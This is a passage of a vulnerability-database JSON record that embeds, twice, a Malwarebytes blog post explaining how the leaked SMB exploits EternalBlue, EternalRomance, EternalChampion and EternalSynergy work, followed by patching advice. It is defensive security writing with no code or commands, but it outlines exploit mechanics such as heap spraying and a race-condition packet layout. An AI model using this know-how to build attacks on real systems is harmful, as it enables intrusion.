["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-07-23T14:42:33"}], "viewCount": 1329, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2019-07-23T14:42:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2019-07-23T14:42:33", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "6101e9f771e61bdfabc16c72de3bc4c0"}, {"key": "href", "hash": "32ae473f1e2110324d79ae9eafed33a8"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "786924bd5317723ff221ebbab8ef99bc"}, {"key": "published", "hash": "786924bd5317723ff221ebbab8ef99bc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4d7c56a2d2ea0a8d03229d75af6c9cc6"}, {"key": "title", "hash": "807b338c137f68e7a8be7b0d14b1be6b"}, {"key": "type", "hash": "24b2b1d79a96c55d12baea27902490f4"}], "scheme": null}], "malwarebytes": [{"id": "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "hash": "a43f1253ae9c28203a59cb9fa22c6a2ab63a9d2ffd5db8966ed452f8456cb09a", "type": "malwarebytes", "bulletinFamily": "blog", "title": "How threat actors are using SMB vulnerabilities", "description": "Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization\u2019s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.\n\nA patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.\n\nSMB vulnerabilities have been so successful for threat actors that they\u2019ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of [Emotet](<https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/>) and 6,222 of [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>) in business networks\u2014two Trojan variants that are using the SMB vulnerabilities\u2014in the last 30 days alone.\n\n### What makes them so effective?\n\nWhat makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a [worm](<https://blog.malwarebytes.com/threats/worm/>)-like infection that keeps spreading itself requires little effort for multiplying returns. And that\u2019s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.\n\nFor example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) for the month of _November 2018_.\n\n\n\nIt\u2019s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.\n\n### How did this come about?\n\nAt the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)\u2014nothing has appeared yet in the wild.\n\nAll these exploits were leaked by the [ShadowBrokers](<https://blog.malwarebytes.com/cybercrime/2017/04/shadowbrokers-fails-to-collect-1m-bitcoins-releases-stolen-information/>) Group, who allegedly stole them from the NSA. Less then a month after ShadowBrokers published their \u201cfindings,\u201d the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.\n\nSince then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations\u2019 networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.\n\nLet\u2019s now take a closer, more technical look at each exploit and how they work.\n\n### EternalBlue\n\nA bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.\n\nA buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.\n\n### EternalRomance\n\nEternal Romance is an RCE attack that exploits [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>) against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nAt the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn\u2019t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.\n\nIn other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.\n\nAfter the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\n### EternalChampion\n\nThe issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers\u2019 advantage.\n\nMeanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.\n\nThis vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:\n\n * A primary transaction request that will immediately be executed.\n * A secondary transaction request that triggers the bug caused by the race condition.\n * Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.\n\nFirst, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.\n\nThe secondary transaction handler copies the secondary transaction request\u2019s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers\u2019 thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.\n\nThe attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler\u2019s thread, and results in the ability for Remote Code Execution.\n\n### EternalSynergy\n\nThe Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.\n\nThis means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.\n\n### EternalRocks\n\nLooking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).\n\n### **Prevention and** remediation\n\nDespite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.\n\nPatch your systems.\n\nThe Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the [Microsoft Security Bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>). This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.\n\nBy applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.\n\nIn addition, many cybersecurity solutions, including [Malwarebytes Endpoint Protection](<https://www.malwarebytes.com/business/endpointprotection/>), offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.\n\nFor example, Malwarebytes\u2019 anti-exploit module detected WannaCry as [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.\n\nIt is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences\u2014especially when SMB vulnerabilities allow infections to spread so quickly.\n\nDon\u2019t be one of those companies. Get protected and stay updated!\n\nThe post [How threat actors are using SMB vulnerabilities](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2018-12-14T16:00:00", "modified": "2018-12-14T16:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-12-14T17:47:19", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "Some of the most devastating ransomware and Trojan malware variants depend on vulnerabilities in the Windows Server Message Block (SMB) to propagate through an organization\u2019s network. Windows SMB is a protocol used by PCs for file and printer sharing, as well as for access to remote services.\n\nA patch was released by Microsoft for SMB vulnerabilities in March 2017, but many organizations and home users have still not applied it. So now, the unpatched systems allow threats that take advantage of these vulnerabilities inside, helping active malware campaigns spread like Californian wildfire.\n\nSMB vulnerabilities have been so successful for threat actors that they\u2019ve been used in some of the most visible ransomware outbreaks and sophisticated Trojan attacks of the last two years. In fact, our product telemetry has recorded 5,315 detections of [Emotet](<https://blog.malwarebytes.com/cybercrime/2018/09/emotet-rise-heavy-spam-campaign/>) and 6,222 of [TrickBot](<https://blog.malwarebytes.com/101/2018/11/trickbot-takes-top-business-threat/>) in business networks\u2014two Trojan variants that are using the SMB vulnerabilities\u2014in the last 30 days alone.\n\n### What makes them so effective?\n\nWhat makes some malware so widespread is the way in which it propagates. While massive spam campaigns only render a few victims that actually pay off, a [worm](<https://blog.malwarebytes.com/threats/worm/>)-like infection that keeps spreading itself requires little effort for multiplying returns. And that\u2019s exactly what the SMB vulnerabilities allow their payloads to do: spread laterally through connected systems.\n\nFor example, WannaCry ransomware (also known as WannaCrypt), which used one of the SMB vulnerabilities, was launched in May 2017, yet the infection continues to expand. Below is the graph that shows our telemetry for [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) for the month of _November 2018_.\n\n\n\nIt\u2019s been more than 1.5 years, and WannaCry continues to proliferate, thanks to the sheer number of unpatched machines connected to infected networks.\n\n### How did this come about?\n\nAt the moment, there are three exploits in the wild that use SMB vulnerabilities. These exploits have been dubbed EternalBlue (used by WannaCry and Emotet), EternalRomance (NotPetya, Bad Rabbit, and TrickBot), and EternalChampion. There is a fourth exploit called EternalSynergy, but we have only seen a Proof of Concept (PoC)\u2014nothing has appeared yet in the wild.\n\nAll these exploits were leaked by the [ShadowBrokers](<https://blog.malwarebytes.com/cybercrime/2017/04/shadowbrokers-fails-to-collect-1m-bitcoins-releases-stolen-information/>) Group, who allegedly stole them from the NSA. Less then a month after ShadowBrokers published their \u201cfindings,\u201d the first fully functional malware that used the EternalBlue exploit, WannaCry, was found in the wild.\n\nSince then, multiple large-scale malware attacks have relied on the SMB vulnerabilities to penetrate organizations\u2019 networks, including the NotPetya and Bad Rabbit ransomware campaigns in 2017, and now the Emotet and TrickBot Trojan attacks, which have been ongoing through the third and fourth quarter of 2018.\n\nLet\u2019s now take a closer, more technical look at each exploit and how they work.\n\n### EternalBlue\n\nA bug in the process of converting File Extended Attributes (FEA) from OS2 structure to NT structure by the Windows SMB implementation can lead to a buffer overflow in the non-paged kernel pool. This non-paged pool consists of virtual memory addresses that are guaranteed to reside in physical memory for as long as the corresponding kernel objects are allocated.\n\nA buffer overflow is a programming flaw that lets the data written to a reserved memory area (the buffer) go outside of bounds (overflow), allowing it to write data to adjacent memory locations. This means attackers are able to control the content of certain memory locations that they should not be able to access, which attackers then exploit to their advantage. In the case of EternalBlue, they are able to control the content of a heap that has execution permission, which leads to the Remote Code Execution (RCE) vulnerability, or the ability to execute commands on a target machine over the network.\n\n### EternalRomance\n\nEternal Romance is an RCE attack that exploits [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>) against the legacy SMBv1 file-sharing protocol. Please note that file sharing over SMB is normally used only on local networks, and the SMB ports are typically blocked from the Internet by a firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nAt the core of this exploit is a type confusion vulnerability. Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn\u2019t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.\n\nIn other cases, type confusion vulnerability leads to an arbitrary heap write, or heap spray. Heap spraying is a method typically used in exploits that places large amounts of code in a memory location that the attacker expects to be read. Usually, these bits of code point to the start of the actual code that the exploit wants to run in order to compromise the system that is under attack.\n\nAfter the spray has finished, the exploit uses an info leak in a TRANS_PEEK_NMPIPE transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\n### EternalChampion\n\nThe issue exploited by EternalChampion is a race condition in how SMBv1 handles transactions. A race condition, or race hazard, is the behavior of a system where the output depends on the sequence or timing of other uncontrollable events. It becomes a bug when events do not happen in the order the programmer intended. Sometimes these bugs can be exploited when the outcome is predictable and works to the attackers\u2019 advantage.\n\nMeanwhile, a transaction is a type of request that can potentially span multiple packets. For example, if a request is too large to fit in a single server message block (SMB), a transaction of the appropriate size can be created, and this will store the data as it is received from multiple SMBs.\n\nThis vulnerability is exploited in two ways: first for an information leak, and second for remote code execution. The bug is first exploited to leak pool information via an out-of-bounds read. To do this, a single packet containing multiple SMBs is sent to the server. This packet contains three relevant pieces:\n\n * A primary transaction request that will immediately be executed.\n * A secondary transaction request that triggers the bug caused by the race condition.\n * Sets of primary transactions that heap spray the pool with the intention to place a transaction structure immediately behind the one that tracks the first primary transaction request.\n\nFirst, a transaction is created that contains the shellcode. This does not start the exploit, it just contains the second stage payload. Next, a packet is sent that contains multiple SMBs. The packet contains all expected transaction data and immediately begins execution.\n\nThe secondary transaction handler copies the secondary transaction request\u2019s data if it fits in the buffer. Except due to the race condition, the pointer now points to the stack of the primary transaction request handlers\u2019 thread (as opposed to the expected pool buffer). This allows an attacker to write their data directly to the stack of another thread.\n\nThe attacker has control over the displacement, so they can choose the amount of data to copy and then copy it. This allows them to precisely overwrite a return address stored on the stack of the primary transaction request handler\u2019s thread, and results in the ability for Remote Code Execution.\n\n### EternalSynergy\n\nThe Proof of Concept for EternalSynergy shows that incoming SMB messages are copied by an initial handler into the corresponding transaction buffer. But the handler automatically assumes that the provided address is the beginning of the buffer. However, during a write transaction, the same address is automatically assumed to be the end of the existing data, and the address pointing to the beginning of the buffer is updated accordingly.\n\nThis means that an attacker can construct a secondary message in the transaction to point beyond the start of the buffer, resulting in a buffer overflow during the copy action.\n\n### EternalRocks\n\nLooking for information about these SMB exploits, you may also run into an exploit called EternalRocks. EternalRocks was not included in the ShadowBrokers release, but was instead constructed and discovered later. EternalRocks uses seven NSA tools where, for example, WannaCry only used two (EternalBlue and another called DoublePulsar).\n\n### **Prevention and** remediation\n\nDespite the significant power SMB vulnerabilities afford to attackers, there is one simple remedy to prevent them from ever becoming problematic.\n\nPatch your systems.\n\nThe Windows Operating Systems vulnerable to the attacks found in the wild all predate Windows 10. Most attacks work only on Windows 7 and earlier, and Microsoft released patches for the vulnerabilities that were leaked under the [Microsoft Security Bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>). This leaves little-to-no reason for networks to be vulnerable to these attacks, yet the number of current victims is overwhelming.\n\nBy applying the patch released by Microsoft in 2017, all your eternal headaches can magically disappear. And for extra measure, we also recommend you patch and update all systems, browsers, and software as soon as possible to shore up any other potential vulnerabilities in the network.\n\nIn addition, many cybersecurity solutions, including [Malwarebytes Endpoint Protection](<https://www.malwarebytes.com/business/endpointprotection/>), offer innovative anti-exploit technology that can block threats such as EternalBlue from ever dropping their payloads and infecting systems.\n\nFor example, Malwarebytes\u2019 anti-exploit module detected WannaCry as [Ransom.WannaCrypt](<https://blog.malwarebytes.com/detections/ransom-wannacrypt/>) right from the start. Below, we created a heat map using our telemetry, showing where the infection started and how fast it spread across the globe.\n\nIt is for good reason that most cybersecurity guides advise users to patch quickly and keep systems updated. So many of the infections seen today could be avoided with consistent monitoring and basic computer maintenance. Unfortunately, a lot of businesses believe they do not have the time or manpower to follow this advice. But when companies leave their networks unprotected, they compromise the integrity of all of our online experiences\u2014especially when SMB vulnerabilities allow infections to spread so quickly.\n\nDon\u2019t be one of those companies. Get protected and stay updated!\n\nThe post [How threat actors are using SMB vulnerabilities](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-12-14T17:47:19", "references": [{"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2018-12-14T17:47:19", "rev": 2, "value": 7.1, "vector": "NONE"}}, "hash": "a74a56a5e345261115c114933e68b9922818efaa8d678b7ba68a1e24cea5a221", "hashmap": [{"hash": "d9861566a7a3d91d8b7889de8f756560", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "618600407f489983189d0d992f1272e6", "key": "type"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "fab8a7a7f05c11614ecd38f9c0b5d170", "key": "href"}, {"hash": "f665a0244ee0bec3b35a68308d6d1c9d", "key": "reporter"}, {"hash": "a0c241a267e58716578a1cf1db23a7bf", "key": "description"}, {"hash": "dce6d600243a8c5294b0bb826c34eb2f", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "dce6d600243a8c5294b0bb826c34eb2f", "key": "published"}], "history": [], "href": "https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/", "id": "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "immutableFields": [], "lastseen": "2018-12-14T17:47:19", "modified": "2018-12-14T16:00:00", "objectVersion": "1.5", "published": "2018-12-14T16:00:00", "references": [], "reporter": "Pieter Arntz", "title": "How threat actors are using SMB vulnerabilities", "type": "malwarebytes", "viewCount": 803}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2018-12-14T17:47:19"}], "viewCount": 948, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", 